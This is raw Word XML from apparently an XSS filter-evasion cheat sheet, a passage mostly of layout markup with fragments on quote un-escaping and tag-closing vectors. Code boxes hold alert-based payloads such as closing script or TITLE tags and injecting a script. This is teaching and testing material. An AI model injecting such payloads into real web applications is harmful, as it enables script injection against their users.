        <w:t>up</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>un-escaping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double</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>quote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causing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4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Cross</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Site</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Scripting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2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fire.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XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>locator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2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method.:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="12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119380</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1010920" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1228" name="Group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0920" cy="116205"/>
                          <a:chOff x="1614" y="188"/>
                          <a:chExt cx="1592" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1229" name="Freeform 1231"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="188"/>
                            <a:ext cx="1592" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3185 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 1592"/>
                              <a:gd name="T2" fmla="+- 0 370 188"/>
                              <a:gd name="T3" fmla="*/ 370 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 1592"/>
                              <a:gd name="T6" fmla="+- 0 370 188"/>
                              <a:gd name="T7" fmla="*/ 370 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 1592"/>
                              <a:gd name="T10" fmla="+- 0 370 188"/>
                              <a:gd name="T11" fmla="*/ 370 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 1592"/>
                              <a:gd name="T14" fmla="+- 0 349 188"/>
                              <a:gd name="T15" fmla="*/ 349 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 1592"/>
                              <a:gd name="T18" fmla="+- 0 346 188"/>
                              <a:gd name="T19" fmla="*/ 346 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 1592"/>
                              <a:gd name="T22" fmla="+- 0 209 188"/>
                              <a:gd name="T23" fmla="*/ 209 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 1592"/>
                              <a:gd name="T26" fmla="+- 0 188 188"/>
                              <a:gd name="T27" fmla="*/ 188 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3185 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 1592"/>
                              <a:gd name="T30" fmla="+- 0 188 188"/>
                              <a:gd name="T31" fmla="*/ 188 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3206 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 1592"/>
                              <a:gd name="T34" fmla="+- 0 209 188"/>
                              <a:gd name="T35" fmla="*/ 209 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3206 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 1592"/>
                              <a:gd name="T38" fmla="+- 0 349 188"/>
                              <a:gd name="T39" fmla="*/ 349 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3188 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 1592"/>
                              <a:gd name="T42" fmla="+- 0 370 188"/>
                              <a:gd name="T43" fmla="*/ 370 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3185 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 1592"/>
                              <a:gd name="T46" fmla="+- 0 370 188"/>
                              <a:gd name="T47" fmla="*/ 37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183">
                                <a:moveTo>
                                  <a:pt x="157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571" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1592" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1592" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1574" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="157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" name="Text Box 1230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88"/>
                            <a:ext cx="159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\";alert('XSS');//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9" o:spid="_x0000_s1206" style="position:absolute;margin-left:80.7pt;margin-top:9.4pt;width:79.6pt;height:9.15pt;z-index:-15700480;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,188" coordsize="159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">
                <v:shape id="Freeform 1231" o:spid="_x0000_s1207" style="position:absolute;left:1614;top:188;width:1592;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="159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CgcMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPS2rDMBDdF3oHMYXuGrkOhMSNbNJCW9e7pDnAYE1s&#10;Y2tkJDlxbl8FCtnN431nW8xmEGdyvrOs4HWRgCCure64UXD8/XxZg/ABWeNgmRRcyUORPz5sMdP2&#10;wns6H0IjYgj7DBW0IYyZlL5uyaBf2JE4cifrDIYIXSO1w0sMN4NMk2QlDXYcG1oc6aOluj9MRsGP&#10;+6rGapkMe/3uy01/5Om6/Fbq+WnevYEINIe7+N9d6jg/TTdw+yaeI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qCgcMAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m1571,182l21,182r-3,l,161r,-3l,21,21,,1571,r21,21l1592,161r-18,21l1571,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1571,370;21,370;18,370;0,349;0,346;0,209;21,188;1571,188;1592,209;1592,349;1574,370;1571,370" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1230" o:spid="_x0000_s1208" type="#_x0000_t202" style="position:absolute;left:1614;top:188;width:159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DF5MYA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBCF74X+h2UK3upGBanRVaS0IBSkMR56nGbH&#10;ZDE7m2ZXTf+9cyj0NsN78943q83gW3WlPrrABibjDBRxFazj2sCxfH9+ARUTssU2MBn4pQib9ePD&#10;CnMbblzQ9ZBqJSEcczTQpNTlWseqIY9xHDpi0U6h95hk7Wtte7xJuG/1NMvm2qNjaWiwo9eGqvPh&#10;4g1sv7h4cz/778/iVLiyXGT8MT8bM3oatktQiYb0b/673lnBn86EX76REf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DF5M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\";alert('XSS');//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rPr>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:sectPr w:rsidR="00AC7743">
          <w:pgSz w:w="11920" w:h="16860"/>
          <w:pgMar w:top="136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72" w:line="333" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="210"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>An</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>alternative,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9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correct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>JSON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JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>escaping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9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applied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embedded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HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>encoding,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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finish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own: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105410</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2137410" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1225" name="Group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7410" cy="116205"/>
                          <a:chOff x="1614" y="166"/>
                          <a:chExt cx="3366" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1226" name="Freeform 1228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3366" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 4959 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 3366"/>
                              <a:gd name="T2" fmla="+- 0 348 166"/>
                              <a:gd name="T3" fmla="*/ 348 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 3366"/>
                              <a:gd name="T6" fmla="+- 0 348 166"/>
                              <a:gd name="T7" fmla="*/ 348 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 3366"/>
                              <a:gd name="T10" fmla="+- 0 347 166"/>
                              <a:gd name="T11" fmla="*/ 347 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 3366"/>
                              <a:gd name="T14" fmla="+- 0 327 166"/>
                              <a:gd name="T15" fmla="*/ 327 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 3366"/>
                              <a:gd name="T18" fmla="+- 0 323 166"/>
                              <a:gd name="T19" fmla="*/ 323 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 3366"/>
                              <a:gd name="T22" fmla="+- 0 187 166"/>
                              <a:gd name="T23" fmla="*/ 187 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 3366"/>
                              <a:gd name="T26" fmla="+- 0 166 166"/>
                              <a:gd name="T27" fmla="*/ 166 h 183"/>
                              <a:gd name="T28" fmla="+- 0 4959 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 3366"/>
                              <a:gd name="T30" fmla="+- 0 166 166"/>
                              <a:gd name="T31" fmla="*/ 166 h 183"/>
                              <a:gd name="T32" fmla="+- 0 4980 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 3366"/>
                              <a:gd name="T34" fmla="+- 0 187 166"/>
                              <a:gd name="T35" fmla="*/ 187 h 183"/>
                              <a:gd name="T36" fmla="+- 0 4980 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 3366"/>
                              <a:gd name="T38" fmla="+- 0 327 166"/>
                              <a:gd name="T39" fmla="*/ 327 h 183"/>
                              <a:gd name="T40" fmla="+- 0 4962 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 3366"/>
                              <a:gd name="T42" fmla="+- 0 347 166"/>
                              <a:gd name="T43" fmla="*/ 347 h 183"/>
                              <a:gd name="T44" fmla="+- 0 4959 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 3366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366" h="183">
                                <a:moveTo>
                                  <a:pt x="334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345" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3366" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3366" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3348" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="334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" name="Text Box 122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336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&lt;/script&gt;&lt;script&gt;alert('XSS');&lt;/script&gt;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6" o:spid="_x0000_s1209" style="position:absolute;margin-left:80.7pt;margin-top:8.3pt;width:168.3pt;height:9.15pt;z-index:-15695872;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,166" coordsize="336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">
                <v:shape id="Freeform 1228" o:spid="_x0000_s1210" style="position:absolute;left:1614;top:165;width:3366;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="336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aGycQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERP22rCQBB9L/gPywh9q5tEsBJdxVtp6YNi9AOG7JhE&#10;s7Mxu2r6991Cwbc5nOtM552pxZ1aV1lWEA8iEMS51RUXCo6Hj7cxCOeRNdaWScEPOZjPei9TTLV9&#10;8J7umS9ECGGXooLS+yaV0uUlGXQD2xAH7mRbgz7AtpC6xUcIN7VMomgkDVYcGkpsaFVSfsluRkG2&#10;3K3lYnne3DZ7GV+/34fbuPlU6rXfLSYgPHX+Kf53f+kwP0lG8PdNOEH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mhsnEAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m3345,182l21,182r-3,-1l,161r,-4l,21,21,,3345,r21,21l3366,161r-18,20l3345,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3345,348;21,348;18,347;0,327;0,323;0,187;21,166;3345,166;3366,187;3366,327;3348,347;3345,348" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1227" o:spid="_x0000_s1211" type="#_x0000_t202" style="position:absolute;left:1614;top:165;width:336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DLTcMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPywi91Y052BpdRaQFoSCN8eBxzI7J&#10;YnY2ZleN/75bKHibx/uc+bK3jbhR541jBeNRAoK4dNpwpWBffL19gPABWWPjmBQ8yMNyMXiZY6bd&#10;nXO67UIlYgj7DBXUIbSZlL6syaIfuZY4cifXWQwRdpXUHd5juG1kmiQTadFwbKixpXVN5Xl3tQpW&#10;B84/zWV7/MlPuSmKacLfk7NSr8N+NQMRqA9P8b97o+P8NH2Hv2/iC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DLT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&lt;/script&gt;&lt;script&gt;alert('XSS');&lt;/script&gt;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End</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Title</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Tag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3728"/>
        </w:tabs>
        <w:spacing w:before="101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64768" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2846070</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>67945</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="424815" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1222" name="Group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815" cy="116205"/>
                          <a:chOff x="4482" y="107"/>
                          <a:chExt cx="669" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1223" name="Freeform 1225"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="4481" y="107"/>
                            <a:ext cx="669" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5129 4482"/>
                              <a:gd name="T1" fmla="*/ T0 w 669"/>
                              <a:gd name="T2" fmla="+- 0 289 107"/>
                              <a:gd name="T3" fmla="*/ 289 h 183"/>
                              <a:gd name="T4" fmla="+- 0 4503 4482"/>
                              <a:gd name="T5" fmla="*/ T4 w 669"/>
                              <a:gd name="T6" fmla="+- 0 289 107"/>
                              <a:gd name="T7" fmla="*/ 289 h 183"/>
                              <a:gd name="T8" fmla="+- 0 4500 4482"/>
                              <a:gd name="T9" fmla="*/ T8 w 669"/>
                              <a:gd name="T10" fmla="+- 0 289 107"/>
                              <a:gd name="T11" fmla="*/ 289 h 183"/>
                              <a:gd name="T12" fmla="+- 0 4482 4482"/>
                              <a:gd name="T13" fmla="*/ T12 w 669"/>
                              <a:gd name="T14" fmla="+- 0 268 107"/>
                              <a:gd name="T15" fmla="*/ 268 h 183"/>
                              <a:gd name="T16" fmla="+- 0 4482 4482"/>
                              <a:gd name="T17" fmla="*/ T16 w 669"/>
                              <a:gd name="T18" fmla="+- 0 265 107"/>
                              <a:gd name="T19" fmla="*/ 265 h 183"/>
                              <a:gd name="T20" fmla="+- 0 4482 4482"/>
                              <a:gd name="T21" fmla="*/ T20 w 669"/>
                              <a:gd name="T22" fmla="+- 0 128 107"/>
                              <a:gd name="T23" fmla="*/ 128 h 183"/>
                              <a:gd name="T24" fmla="+- 0 4503 4482"/>
                              <a:gd name="T25" fmla="*/ T24 w 669"/>
                              <a:gd name="T26" fmla="+- 0 107 107"/>
                              <a:gd name="T27" fmla="*/ 107 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5129 4482"/>
                              <a:gd name="T29" fmla="*/ T28 w 669"/>
                              <a:gd name="T30" fmla="+- 0 107 107"/>
                              <a:gd name="T31" fmla="*/ 107 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5150 4482"/>
                              <a:gd name="T33" fmla="*/ T32 w 669"/>
                              <a:gd name="T34" fmla="+- 0 128 107"/>
                              <a:gd name="T35" fmla="*/ 128 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5150 4482"/>
                              <a:gd name="T37" fmla="*/ T36 w 669"/>
                              <a:gd name="T38" fmla="+- 0 268 107"/>
                              <a:gd name="T39" fmla="*/ 268 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5132 4482"/>
                              <a:gd name="T41" fmla="*/ T40 w 669"/>
                              <a:gd name="T42" fmla="+- 0 289 107"/>
                              <a:gd name="T43" fmla="*/ 289 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5129 4482"/>
                              <a:gd name="T45" fmla="*/ T44 w 669"/>
                              <a:gd name="T46" fmla="+- 0 289 107"/>
                              <a:gd name="T47" fmla="*/ 2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69" h="183">
                                <a:moveTo>
                                  <a:pt x="647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47" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="668" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="668" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="650" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="64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" name="Text Box 1224"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="4481" y="107"/>
                            <a:ext cx="66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9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&lt;TITLE&gt;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3" o:spid="_x0000_s1212" style="position:absolute;left:0;text-align:left;margin-left:224.1pt;margin-top:5.35pt;width:33.45pt;height:9.15pt;z-index:-17651712;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="4482,107" coordsize="66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">
                <v:shape id="Freeform 1225" o:spid="_x0000_s1213" style="position:absolute;left:4481;top:107;width:669;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="66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gvTMQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPS2vCQBC+C/6HZQRvummEIqmrFFEUD1LTBz1Os9Mk&#10;mJ0Nu6tJ/31XELzNx/ecxao3jbiS87VlBU/TBARxYXXNpYKP9+1kDsIHZI2NZVLwRx5Wy+FggZm2&#10;HZ/omodSxBD2GSqoQmgzKX1RkUE/tS1x5H6tMxgidKXUDrsYbhqZJsmzNFhzbKiwpXVFxTm/GAU/&#10;h+Nufc795tKdPt3m+634mrm5UuNR//oCIlAfHuK7e6/j/DSdwe2beIJ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oL0zEAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m647,182r-626,l18,182,,161r,-3l,21,21,,647,r21,21l668,161r-18,21l647,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="647,289;21,289;18,289;0,268;0,265;0,128;21,107;647,107;668,128;668,268;650,289;647,289" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1224" o:spid="_x0000_s1214" type="#_x0000_t202" style="position:absolute;left:4481;top:107;width:66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JVOsMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPywi91Y2hSI2uItKCUCjGePA4Zsdk&#10;MTsbs6um/74rFLzN433OfNnbRtyo88axgvEoAUFcOm24UrAvvt4+QPiArLFxTAp+ycNyMXiZY6bd&#10;nXO67UIlYgj7DBXUIbSZlL6syaIfuZY4cifXWQwRdpXUHd5juG1kmiQTadFwbKixpXVN5Xl3tQpW&#10;B84/zeXnuM1PuSmKacLfk7NSr8N+NQMRqA9P8b97o+P8NH2Hxzfx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JVO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9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&lt;TITLE&gt;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simple</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>vector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closes</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>tags,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9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encapsulate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malicious</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>cross</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>site</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>scripting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>attack:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="9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2083435" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1219" name="Group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3435" cy="116205"/>
                          <a:chOff x="1614" y="240"/>
                          <a:chExt cx="3281" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1220" name="Freeform 1222"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="240"/>
                            <a:ext cx="3281" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 4874 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 3281"/>
                              <a:gd name="T2" fmla="+- 0 422 240"/>
                              <a:gd name="T3" fmla="*/ 422 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 3281"/>
                              <a:gd name="T6" fmla="+- 0 422 240"/>
                              <a:gd name="T7" fmla="*/ 422 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 3281"/>
                              <a:gd name="T10" fmla="+- 0 422 240"/>
                              <a:gd name="T11" fmla="*/ 422 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 3281"/>
                              <a:gd name="T14" fmla="+- 0 401 240"/>
                              <a:gd name="T15" fmla="*/ 401 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 3281"/>
                              <a:gd name="T18" fmla="+- 0 398 240"/>
                              <a:gd name="T19" fmla="*/ 398 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 3281"/>
                              <a:gd name="T22" fmla="+- 0 261 240"/>
                              <a:gd name="T23" fmla="*/ 261 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 3281"/>
                              <a:gd name="T26" fmla="+- 0 240 240"/>
                              <a:gd name="T27" fmla="*/ 240 h 183"/>
                              <a:gd name="T28" fmla="+- 0 4874 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 3281"/>
                              <a:gd name="T30" fmla="+- 0 240 240"/>
                              <a:gd name="T31" fmla="*/ 240 h 183"/>
                              <a:gd name="T32" fmla="+- 0 4895 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 3281"/>
                              <a:gd name="T34" fmla="+- 0 261 240"/>
                              <a:gd name="T35" fmla="*/ 261 h 183"/>
                              <a:gd name="T36" fmla="+- 0 4895 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 3281"/>
                              <a:gd name="T38" fmla="+- 0 401 240"/>
                              <a:gd name="T39" fmla="*/ 401 h 183"/>
                              <a:gd name="T40" fmla="+- 0 4877 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 3281"/>
                              <a:gd name="T42" fmla="+- 0 422 240"/>
                              <a:gd name="T43" fmla="*/ 422 h 183"/>
                              <a:gd name="T44" fmla="+- 0 4874 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 3281"/>
                              <a:gd name="T46" fmla="+- 0 422 240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281" h="183">
                                <a:moveTo>
                                  <a:pt x="326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260" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3281" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3281" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3263" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="326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" name="Text Box 1221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0"/>
                            <a:ext cx="328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&lt;/TITLE&gt;&lt;SCRIPT&gt;alert("XSS");&lt;/SCRIPT&gt;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0" o:spid="_x0000_s1215" style="position:absolute;margin-left:80.7pt;margin-top:12pt;width:164.05pt;height:9.15pt;z-index:-15695360;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,240" coordsize="328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">
